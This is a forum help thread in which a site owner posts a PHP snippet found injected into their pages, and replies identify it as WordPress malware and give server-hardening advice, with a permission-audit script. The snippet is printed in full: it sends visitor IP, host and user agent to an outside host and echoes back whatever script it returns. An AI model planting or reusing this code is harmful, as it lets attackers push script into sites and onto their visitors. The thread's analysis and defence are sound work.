
what is this code?


lingo5
Solved by Jacques1


<?php
#bbce85#
error_reporting(0); @ini_set('display_errors', 0); // hide any errors the snippet itself causes
$wp_jgm13 = @$_SERVER['HTTP_USER_AGENT'];
// Only fires for browser-like user agents (Gecko/MSIE) that do not look like crawlers
if ((preg_match('/Gecko|MSIE/i', $wp_jgm13) && !preg_match('/bot/i', $wp_jgm13))) {
    // Beacon URL assembled from string fragments; sends the visitor's IP, host and UA to a remote server
    $wp_jgm0913 = "http://" . "web" . "https" . ".com/" . "web/?ip=" . $_SERVER['REMOTE_ADDR'] . "&referer=" . urlencode($_SERVER['HTTP_HOST']) . "&ua=" . urlencode($wp_jgm13);
    if (function_exists('curl_init') && function_exists('curl_exec')) { // fetch the remote response with whichever HTTP client is available
        $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_jgm0913); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $wp_13jgm = curl_exec($ch); curl_close($ch);
    } elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {
        $wp_13jgm = @file_get_contents($wp_jgm0913);
    } elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
        $wp_13jgm = @stream_get_contents(@fopen($wp_jgm0913, "r"));
    }
}
// If the response starts with "<scr" (a <script> tag), it is echoed straight into the page
if (substr($wp_13jgm, 1, 3) === 'scr') { echo $wp_13jgm; }
#/bbce85#
?>

I've found this piece of code in some of my pages and I didn't put it there... Please help me identify what it is. Thanks.

 


If you didn't put the code into the scripts, then it's malware. This particular snippet seems to be known Wordpress malware which loads content from an external URL and embeds it into your site.

 

But the details don't matter. Take your site down right now, grab somebody who understands system administration and carefully reinstall everything from the ground up, this time with proper security. There's something very, very wrong with your server when people can change your PHP scripts.


There may certainly be a vulnerability in your code, but the real issue is that your PHP scripts are writable. An application must never be able to change arbitrary files on your server, no matter how broken it is.

 

So before you jump to Wordpress-specific fixes, you should take care of basic server security:

  • Are you using a plaintext protocol like FTP? Then you need to switch to SFTP or SCP.
  • Do you use password-based authentication? Then generate a new long, random password with a password manager like KeePass. Also consider switching to public-key authentication.
  • Check your file permissions and reduce them to the absolute minimum. PHP scripts only have to be readable (by the webserver), not writable and not executable.
  • Check the security of your database. Never use the database superuser for applications, and make sure you have a strong password.

Those simple steps will prevent a lot of attacks. We won't be able to make Wordpress (or similar software) perfectly secure, but we can definitely ensure that an application vulnerability won't compromise our entire server.

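As an added example (not code from the thread or from any of its posters), here is a small POSIX shell audit that implements the file-permission point in the list above and also locates other pages carrying the same "#bbce85#" delimiter as the injected snippet; the web root path and the webserver account and group are assumed arguments.

```shell
#!/bin/sh
# Added example, not from the thread: audit and harden a PHP web root along the
# lines of the permission advice above. Assumptions (all hypothetical): POSIX sh
# with find/grep/chmod; the webserver account name and group are passed in.

# Lists PHP files under $1 that the webserver account ($2, primary group $3)
# could modify, or that carry any execute bit. Note that a "normal" 0644 file
# is flagged when the webserver itself owns it: that is precisely the setup
# in which an application bug can rewrite a script on disk.
audit_php_perms() {
    webroot="$1"; wwwuser="$2"; wwwgroup="$3"
    find "$webroot" -type f -name '*.php' \( \
        -perm -002 \
        -o \( -user "$wwwuser" -perm -200 \) \
        -o \( -group "$wwwgroup" -perm -020 \) \
        -o -perm -100 -o -perm -010 -o -perm -001 \
    \) -print | sort
}

# Lists PHP files that carry the "#bbce85#" delimiter seen in the injected
# snippet; a quick way to find every page that received the same payload.
find_marker() {
    find "$1" -type f -name '*.php' -exec grep -l -F '#bbce85#' {} + 2>/dev/null || true
}

# Makes every PHP file read-only (0444): readable by the webserver, writable by
# nobody without an explicit chmod (or root) first. Run after reviewing the
# audit output, and re-run it after each deployment.
harden_php_perms() {
    find "$1" -type f -name '*.php' -exec chmod 0444 {} +
}

# Example invocation (path and account names are placeholders):
# audit_php_perms /var/www/html www-data www-data
```

The audit deliberately treats owner-writable files as a finding when the owner is the webserver account, which is the common shared-hosting layout the thread is warning about.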

There may certainly be a vulnerability in your code, but the real issue is that your PHP scripts are writable. An application must never be able to change arbitrary files on your server, no matter how broken it is.

If there is a problem in the code that lets you upload malicious files instead of, say, images, has LFI/RFI vulnerabilities, has eval(), etc., then you basically have access to the server itself. Even if Apache is unable to write to any other file except one vulnerable one, you could still potentially exploit something like a privilege escalation vulnerability on the server.

 

There are valid reasons to allow the application to write PHP files. Caching is a big part of that, as well as configuration management, etc. A vulnerability in systems like that would be bad news.


If there is a problem in the code that lets you upload malicious files instead of, say, images, has LFI/RFI vulnerabilities, has eval(), etc., then you basically have access to the server itself. Even if Apache is unable to write to any other file except one vulnerable one, you could still potentially exploit something like a privilege escalation vulnerability on the server.

 

That's why every programmer/administrator in their right mind uses a defense-in-depth approach: You need to take care of the OS and the webserver and the applications and the database system etc.

 

Keeping your Wordpress up-to-date is a good start, but it's not enough.


There are valid reasons to allow the application to write PHP files. Caching is a big part of that, as well as configuration management, etc.

 

I don't care if there are valid reasons for giving Wordpress write access to PHP files. Considering the security record of this software, I wouldn't do it, especially when it's a private website which can easily be maintained by hand.

 

It's a different story for professional applications (which this thread isn't about). But even then you need a damn good reason for relaxing the read-only policy.


That's why every programmer/administrator in their right mind uses a defense-in-depth approach: You need to take care of the OS and the webserver and the applications and the database system etc.

Every programmer/administrator in their right mind (hopefully) isn't using Wordpress. :P

 

You can (and should) take the proper precautions on the server-side, but if you have a vulnerability in the code that lets you drop to a shell, there's a good chance you're going to get pwned.

 

I don't care if there are valid reasons for giving Wordpress write access to PHP files. Considering the security record of this software, I wouldn't do it, especially when it's a private website which can easily be maintained by hand.

True, I guess I wasn't talking about Wordpress specifically anymore.


You can (and should) take the proper precautions on the server-side, but if you have a vulnerability in the code that lets you drop to a shell, there's a good chance you're going to get pwned.

 

No doubt about that.

 

So in case my previous reply wasn't clear enough: Both the server configuration and Wordpress need to be fixed. This includes all plug-ins, because a lot of vulnerabilities are in fact introduced through poorly written third-party additions.

Edited by Jacques1

  • Solution

That's a bit strange, but there's no rule saying that WP malware can only infect WP-based applications.

 

Anyway, all of the above still applies. If you've written the code yourself, replace “Update your application” with “Learn the basics of PHP security and fix your code accordingly”.

